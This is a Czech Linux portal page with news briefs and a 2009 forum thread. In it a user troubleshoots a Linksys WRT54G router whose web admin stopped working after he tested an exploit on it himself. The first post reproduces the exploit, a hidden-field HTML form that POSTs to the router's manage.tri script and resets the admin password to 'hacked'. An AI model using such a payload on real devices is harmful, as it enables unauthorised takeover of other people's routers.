AbcLinuxu hledá autory!

Inzerujte na AbcPráce.cz od 950 Kč

Rozšířené hledání

napište » Zprávičky

inzerujte » Pracovní nabídky

openSUSE Leap 16 Beta

dnes 22:33 | Nová verze

Byla vydána beta verze openSUSE Leap 16. Ve výchozím nastavení s novým instalátorem Agama.

Ladislav Hagara | Komentářů: 0

Kultovní hra Brány Skeldalu je na Steamu

dnes 17:44 | Zajímavý článek

Devadesátková hra Brány Skeldalu prošla portací a je dostupná na platformě Steam. Vyšel i parádní blog autora o portaci na moderní systémy a platformy včetně Linuxu.

karkar | Komentářů: 0

Linux v Excelu

dnes 12:11 | Humor

Lidi dělají divné věci. Například spouští Linux v Excelu. Využít je emulátor RISC-V mini-rv32ima sestavený jako knihovna DLL, která je volaná z makra VBA (Visual Basic for Applications).

Ladislav Hagara | Komentářů: 2

Revolut nabídne neomezený mobilní tarif za 12,50 eur (312 Kč)

dnes 10:44 | IT novinky

Revolut nabídne neomezený mobilní tarif za 12,50 eur (312 Kč). Aktuálně startuje ve Velké Británii a Německu.

Ladislav Hagara | Komentářů: 22

První várka družic projektu Kuiper

dnes 09:55 | IT novinky

Společnost Amazon miliardáře Jeffa Bezose vypustila na oběžnou dráhu první várku družic svého projektu Kuiper, který má z vesmíru poskytovat vysokorychlostní internetové připojení po celém světě a snažit se konkurovat nyní dominantnímu Starlinku nejbohatšího muže planety Elona Muska.

Ladislav Hagara | Komentářů: 2

GPT-4o uživatelům příliš podlézal

dnes 09:33 | IT novinky

Poslední aktualizací začal model GPT-4o uživatelům příliš podlézat. OpenAI jej tak vrátila k předchozí verzi.

Ladislav Hagara | Komentářů: 0

Google Chrome 136

dnes 08:11 | Nová verze

Google Chrome 136 byl prohlášen za stabilní. Nejnovější stabilní verze 136.0.7103.59 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 8 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

Ladislav Hagara | Komentářů: 0

Homebrew 4.5.0

včera 20:55 | Nová verze

Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.

Ladislav Hagara | Komentářů: 0

Firefox 138.0

včera 16:22 | Nová verze

Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.

Ladislav Hagara | Komentářů: 0

Registrace jOpenSpace 2025

včera 15:55 | Pozvánky

Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových

… více »

Zdenek H. | Komentářů: 2

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 19, poslední dnes 11:32

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Hardwarová poradna / Router Linksys WRT54G - hacked - nejde http na routeru

Štítky: HTML, Internet, konfigurace, password, router, TELNET, web

Dotaz: Router Linksys WRT54G - hacked - nejde http na routeru

9.5.2009 09:44 Otto Šabart | skóre: 13 | blog: KatiePC blog
Router Linksys WRT54G - hacked - nejde http na routeru

Přečteno: 1198×

Odpovědět | Admin

Ahojte, mam menší problém.

Vlastnim router Linksys wrt54g (version 7). Neveril jsem tomu, že existuje na tento router exploit pomocí kterého si bez problému zmenite cele master password. Musel jsem to vyzkouset. Exploit posle data pres POST na script roterovsky script manage.tri.

Ukazka vypada nejak takto:





<\form method="post" action="http://192.168.2.1/manage.tri">

<\input type="hidden" name="remote_mgt_https" value="0">

<\input type="hidden" name="http_enable" value="1">

<\input type="hidden" name="https_enable" value="0">

<\input type="hidden" name="PasswdModify" value="1">

<\input type="hidden" name="http_passwd" value="hacked">

<\input type="hidden" name="http_passwdConfirm" value="hacked">

<\input type="hidden" name="_http_enable" value="1">

<\input type="hidden" name="web_wl_filter" value="1">

<\input type="hidden" name="remote_management" value="0">

<\input type="hidden" name="upnp_enable" value="1">

<\input type="hidden" name="layout" value="en">

<\input type="submit">

<\/form>

Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.

Situaci jsem chtel resit pres telnet. Jenze u verze 7 telnet nefunguje.

Nevite nekdo jakym zpusobem http nahodit nebo jestli MasterReset zafunguje a nahodi sluzbu?

Za vsechny napady dekuju.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení dotazu:

Komentář #5 (Otto Šabart, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

9.5.2009 14:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Eh, otevřít to a připojit se přes JTAG asi nemůžeš, že? Jinak já bych to vyresetoval a když to nepomůže, tak bych si sehnal nádobíčko pro připojení k sériáku... Google: Linksys WRT54G jtag, nezoufej, vypadá to, že si s ním užili i jiní ;-)

9.5.2009 14:35 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

No, bude to jeste asi dost zajimavy. Pockam na chvili az bude opravdu nutne router vyresetovat a uvidime jestli sluzba naskoci. Resit to pres ten JTAG je celkem neomalene reseni, ale kdyz mi nic jineho nezbyde, tak to zkusim. Treba se neco priucim.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

10.5.2009 19:39 R
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4"

Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.

10.5.2009 21:52 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ja ("nastesti" - ono jak kdy :-) ), primo do internetu pripojen nejsem. Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit :-) ).

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení 1× (Otto Šabart (tazatel))

11.5.2009 18:03 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Takze jsem router vyresetoval, a to nekolikrat. Asi az treti restart pomohl a http naskocilo. Vse jsem znovu nakonfiguraoval a uz vse funguje tak jak ma. Dekuji za odpovedi.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Založit nové vlákno • Nahoru

Tiskni Sdílej: